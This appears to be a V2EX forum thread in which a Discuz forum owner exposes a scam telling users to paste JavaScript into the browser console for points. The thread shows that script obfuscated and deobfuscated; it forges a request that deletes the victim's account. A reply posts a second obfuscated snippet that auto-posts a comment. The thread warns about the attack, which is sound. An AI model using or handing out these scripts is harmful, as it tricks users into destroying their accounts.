discuz 漏洞真 j8 多有人在我论坛搞事情。。。传播一段 js 把我论坛搞炸了

2018-11-11 23:15:27 +08:00

Event

这两天有人在我站水帖。。。。。告诉别的用户在 console 执行一段脚本能领到积分。。结果他们自己账号变得乱七八糟的了。。。
废话不说。。。上代码你们自己看看

location['\x68\x72\x65\x66']=((d=(await(await fetch("\x2e\x2f\x68\x6f\x6d\x65\x2e\x70\x68\x70\x3f\x6d\x6f\x64\x3d\x73\x70\x61\x63\x65\x63\x70\x26\x61\x63\x3d\x61\x76\x61\x74\x61\x72",{credentials:'\x69\x6e\x63\x6c\x75\x64\x65'}))['\x74\x65\x78\x74']())['\x6d\x61\x74\x63\x68'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['\x72\x65\x70\x6c\x61\x63\x65']('\x69\x6d\x61\x67\x65\x73\x2f\x63\x61\x6d\x65\x72\x61\x2e\x73\x77\x66\x3f','\x3f\x6d\x3d\x75\x73\x65\x72\x26\x61\x3d\x64\x65\x6c\x65\x74\x65\x26'))&&confirm('\u7eff\u5b9d\u77f3'))?d:'';

9111 次点击

所在节点

信息安全

56 条回复

Event

2018-11-12 00:04:53 +08:00

@Perry 感觉小白不清楚会出事情

airyland

2018-11-12 00:33:03 +08:00

所以你们到底嫌 JS 权限太大还是太小了？？

airyland

2018-11-12 00:34:07 +08:00

试了楼上的代码，自动发出回复了。。

crab

2018-11-12 00:38:22 +08:00

https://imgur.com/4so7bfg

crab

2018-11-12 00:38:36 +08:00

KasuganoSoras

2018-11-12 03:46:02 +08:00

这个 bug 老早就有了，我成功删了自己在很多论坛的账号。
不过我现在都自己开发论坛了，不用 Discuz

kzfile

2018-11-12 07:55:46 +08:00

所以你们到底嫌 JS 权限太大还是太小了？？

murmur

2018-11-12 08:09:25 +08:00

为什么那么多网站都在 console 里打东西提醒用户不要执行陌生人发来的代码

ThirdFlame

2018-11-12 08:41:49 +08:00

人肉型 CSRF

lixueyu001

2018-11-12 08:45:24 +08:00

所以你们到底嫌 JS 权限太大还是太小了？？

bojackhorseman

2018-11-12 08:49:18 +08:00

所以你们到底嫌 JS 权限太大还是太小了？？

v9ex

2018-11-12 08:51:32 +08:00

$("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x76\x61\x6c"]("\u6240\u4ee5\u4f60\u4eec\u5230\u5e95\u5acc\x4a\x53\u6743\u9650\u592a\u5927\u8fd8\u662f\u592a\u5c0f\u4e86\uff1f\uff1f");$("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x70\x61\x72\x65\x6e\x74"]()["\x73\x75\x62\x6d\x69\x74"]();

Removable

2018-11-12 08:57:24 +08:00

所以你们到底嫌 JS 权限太大还是太小了？？

respect11

2018-11-12 08:58:39 +08:00

所以你们到底嫌 JS 权限太大还是太小了？？

s527332935

2018-11-12 09:07:54 +08:00

所以你们到底嫌 JS 权限太大还是太小了？？

Lebal

2018-11-12 09:14:33 +08:00

所以你们到底嫌 JS 权限太大还是太小了？？

FakeLeung

2018-11-12 09:16:14 +08:00

location['href']=(
(d=(await(await fetch("./home.php?mod=spacecp&ac=avatar", {credentials: 'include'})['text']())['match'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['replace']('images/camera.swf?', '?m=user&a=delete&')&&confirm('绿宝石'))?d:'';

来来来，大神们分析一下，这是 js 的问题还是后端的问题？
@respect11
@Removable
@bojackhorseman
@lixueyu001
@airyland

autoxbc

2018-11-12 09:38:44 +08:00

其实是人的问题，在微利下人就失去理智，罔顾不懂的事情不要做的常识，跟技术没半点关系

crystom

2018-11-12 10:22:43 +08:00

所以你们到底嫌 JS 权限太大还是太小了？？

imzhoukunqiang

2018-11-12 11:36:31 +08:00

所以你们到底嫌 JS 权限太大还是太小了？？

第 2 页／共 3 页

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/506823

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

discuz 漏洞真 j8 多 有人在我论坛搞事情。。。传播一段 js 把我论坛搞炸了

discuz 漏洞真 j8 多有人在我论坛搞事情。。。传播一段 js 把我论坛搞炸了